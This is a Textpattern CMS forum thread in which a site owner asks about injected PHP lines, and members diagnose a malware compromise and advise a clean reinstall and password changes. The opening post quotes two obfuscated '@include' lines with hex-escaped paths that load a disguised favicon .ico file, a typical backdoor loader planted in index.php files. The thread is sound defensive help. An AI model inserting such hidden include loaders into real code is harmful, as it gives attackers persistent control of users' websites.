Textpattern CMS

#1 2018-04-13 01:01:35

tedweitz

Member

Registered: 2015-03-08

Posts: 19

malware in the code

I have a real issue with migrating my site to a new host

Dreamhost tells me that many php files have this code line that is a malware including textpattern/txp_img/index.php

<?php
/*0d017*/

@include "\x2fhom\x65/te\x64wei\x74z/t\x65dwe\x69tz.\x63om/\x4dyPi\x63tur\x65s/b\x64/im\x61ges\x2ffav\x69con\x5f398\x667a.\x69co";

/*0d017*/

Or textpattern/theme/index.php

<?php
/*6a2bd*/

@include "\x2fhome\x2ftedw\x65itz/\x74edwe\x69tz.c\x6fm/My\x50ictu\x72es/b\x64/ima\x67es/f\x61vico\x6e_398\x667a.i\x63o";

/*6a2bd*/

Is this @include line a legitimate PHP code or should I remove it from all the files that have it

I have just updated to the newest Textpattern

textpattern directories with such files are

textpattern/lib/index.php
textpattern/theme/index.php
textpattern/lpublish/index.php
textpattern/lang/index.php
textpattern/include/index.php
textpattern/txp_img/index.php
textpattern/temp/index.php
files/index.php
rpc/index.php

Thanks so much Sorry for these issues

Ted

Can I remove any of these directories where these files apear to be the only file

EDIT: Textile —uli

Last edited by uli (2018-04-13 10:04:20)

#2 2018-04-13 03:24:01

kuopassa

Plugin Author

From: Porvoo, Finland

Registered: 2008-12-03

Posts: 241

Website

Re: malware in the code

The part that is <?php is quite normal and mustn’t be removed in PHP files.

Lines that are like /*0d017*/ are comments and they should be harmless.

Lines that begin with (at)include try to silently load some file. In your code example those scrambled lines with include command can/should be deleted. They in my understanding try to load an icon file from directory /MyPictures/bd/images/favicon_398f7a.ico.

---

Textpattern Plugins

#3 2018-04-13 03:44:17

bici

Member

From: vancouver

Registered: 2004-02-24

Posts: 2,131

Website Mastodon

Re: malware in the code

tedweitz wrote #310974:

I have a real issue with migrating my site to a new host
Dreamhost tells me that many php files have this code line that is a malware including textpattern/txp_img/index.php

there are a few other txp users who use Dreamhost. Perhaps they can provide some insights on your issues.

---

…. texted postive

#4 2018-04-13 06:24:33

phiw13

Plugin Author

From: South-Western Japan

Registered: 2004-02-27

Posts: 3,416

Website

Re: malware in the code

@ Ted,

most of the files you list are NOT part of a default Textpattern install. (e.g textpattern/theme/index.php

Did you move those files from your previous host? (nd had you possibly bet hacked on that previous host?)

Here is a suggestion:

• download a fresh package of Textpattern 4.6.2 (from here).
• On your server, delete everything in the texpattern folder, except your config.php file – download that to your local disc, and check the contents in a text editor.
• Deleted also the RPC folder, have a look inside the files folder and delete the index.php file – it should not exist.

Then upload the freshly downloaded Textpattern 4.6 to your server (do not upload the files and images folders).

---

Where is that emoji for a solar powered submarine when you need it ?
Sand space – admin theme for Textpattern
phiw13 on Codeberg

#5 2018-04-13 10:46:00

uli

Moderator

From: Cologne

Registered: 2006-08-15

Posts: 4,315

Re: malware in the code

In addition to phiw13’s instructions: Change each and every password you have created for your website, be it for your client login to Dreamhost, for FTP, email, databases, Textpattern login, etc. Do not use them ever again, nowhere. Create unique new PWs for each of them, i.e. do not use any of them for another purpose. You can create new ones using e.g. the keychain app of your Mac, the longer the safer.

---

_{In bad weather I never leave home without wet_plugout, smd_where_used and adi_form_links}

#6 2018-04-18 00:04:46

tedweitz

Member

Registered: 2015-03-08

Posts: 19

Re: malware in the code

Thanks so much guys

That was a long process, somehow that Malware was having a party on my site. It seemed to infect every folder with bunch of files.

I went in and manually removed each one of these files or lines in my essential files. As my understanding of this environment is very limited it was a long and confusing process. It didn’t help that the Dreamhost’s Malware removal tool and my desktop’s Norton said all files are clean.

I appreciate the help I received on this site tremendously

Somehow I lived through this migration/upgrading/malware removal so my sites are up and alive

Thanks so much!

Ted
tedweitz.com
tedsgallery.com

#7 2018-04-18 17:25:00

gaekwad

Server grease monkey

From: People's Republic of Cornwall

Registered: 2005-11-19

Posts: 4,370

GitHub

Re: malware in the code

Ah, the wonders of shared hosting!

If you have an offsite archive of your website, it might be interesting to compress it (minus images and legit uploaded files) and upload it to www.virustotal.com – I’ve discovered all manner of obscure weirdness there with inherited sites.

PS: Ted, I think I did some Textpattern stuff for you some years ago – hope you’re keeping well!

---

Textpattern CMS demo – tech updates

Code is Poetry; Text is Pattern.